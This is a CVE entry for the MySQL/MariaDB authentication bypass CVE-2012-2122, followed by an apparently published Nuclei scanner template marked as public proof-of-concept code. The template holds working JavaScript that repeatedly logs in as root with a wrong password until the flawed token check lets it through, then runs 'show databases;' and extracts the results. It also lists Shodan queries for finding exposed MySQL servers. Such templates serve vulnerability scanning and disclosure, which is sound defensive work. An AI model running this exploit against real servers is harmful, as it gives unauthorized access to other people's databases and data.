sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
PoC代码[已公开]
id: CVE-2012-2122
info:
name: MySQL - Authentication Bypass
author: pussycat0x
severity: medium
description: |
sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
reference:
- https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122
- http://kb.askmonty.org/en/mariadb-5162-release-notes/
- http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
- http://security.gentoo.org/glsa/glsa-201308-06.xml
- http://securitytracker.com/id?1027143
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P
cvss-score: 5.1
cve-id: CVE-2012-2122
cwe-id: CWE-287
epss-score: 0.9407
epss-percentile: 0.99899
cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: oracle
product: mysql
shodan-query:
- "product:\"MySQL\""
- product:"mysql"
tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const mysql = require('nuclei/mysql');
const client = new mysql.MySQLClient;
for (let i = 1; i <= 1001; i++) {
try {
const connected = client.ExecuteQuery(Host, Port, User, Pass, Query);
Export(connected);
break;
} catch {
// error
}
}
args:
Host: "{{Host}}"
Port: 3306
User: "root"
Pass: "wrong"
Query: "show databases;"
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- .Rows[] | .Database
# digest: 4b0a00483046022100d2decbf033fb9ff262e8e5fb17ebb2b51091fb6d8257a3b100cf72aa9043c0460221009bd2ad29790a2dadbd1bc69457510dab5547a1fe6b125ed8390646df047c8f80:922c64590222798bb761d5b6d8e72950